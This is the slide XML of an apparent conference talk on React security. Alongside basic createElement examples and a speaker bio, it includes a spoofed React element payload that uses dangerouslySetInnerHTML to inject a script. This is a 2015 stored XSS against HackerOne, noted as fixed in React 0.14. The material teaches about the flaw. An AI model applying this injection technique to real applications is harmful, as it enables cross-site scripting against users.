                        <a:t> element </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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>createElement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  'h1'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>,                        //type</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>className</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'greeting'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>},     //[props]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  'Hello</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world</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a: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//[children]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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86062677"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414200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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="6011333" cy="4848225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Sr. Research Lead at Synopsys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>8 years in security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PhD candidate at GWU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>KseniaDmitrieva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Mother</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ballroom dancer</a:t>
            </a:r>
          </a:p>
          <a:p>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24" y="1211574"/>
            <a:ext cx="2190750" cy="857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9571" y="1211574"/>
            <a:ext cx="3217728" cy="4789176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298141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Dynamically Created Components – Part I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3493630166"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="828685" y="1750237"/>
          <a:ext cx="7832651" cy="1054384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7832651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="320404432"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="638777">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>attacker_payload</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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>JSON</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parse</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some_user_input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render</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return</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&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>span</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>attacker_payload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>span</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;;</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:b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930748722"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828685" y="1395078"/>
            <a:ext cx="10972800" cy="367243"/>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sz="1800" dirty="0"/>
              <a:t>March 2015 – stored XSS in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>HackerOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> itself - by Daniel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>LeCheminant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3964102695"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="828685" y="3315849"/>
          <a:ext cx="7832651" cy="2761264"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7832651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1992347001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1534381">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>isReactElement</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true</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_store</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type</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"body"</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props</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dangerouslySetInnerHTML</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__html</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"&lt;script&gt;alert('No CSP Support :(')&lt;/script&gt;"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944833145"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828685" y="2875811"/>
            <a:ext cx="10972800" cy="425455"/>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sz="1800" dirty="0"/>
              <a:t>Submit a React object with “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>()” field with __html attribute:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9035784" y="4876800"/>
            <a:ext cx="2765701" cy="1200312"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Fixed in React 0.14 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(Nov 2015): plain text objects are no longer supported.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4169268" y="6091696"/>
            <a:ext cx="4549643" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>http://danlec.com/blog/xss-via-a-spoofed-react-element</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13585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Dynamically Created Components – Part II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3119398"/>
            <a:ext cx="10972800" cy="3111281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injecting into the type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create an arbitrary React component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No attributes (event handlers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, style)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injecting into props:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” property</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40659769"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1211574"/>
          <a:ext cx="6319284" cy="1907824"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6319284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="556568719"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1422430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Transpiled</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> to JavaScript </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> element </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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>createElement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</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1" dirty="0">
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'h1'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>,                        //type</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>className</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'greeting'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>},     //[props]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  'Hello</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world</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a: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//[children]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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8606267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32696305"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1220948"/>
          <a:ext cx="6319284" cy="1907824"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6319284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="556568719"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1422430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Transpiled</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> to JavaScript </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> element </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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>createElement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
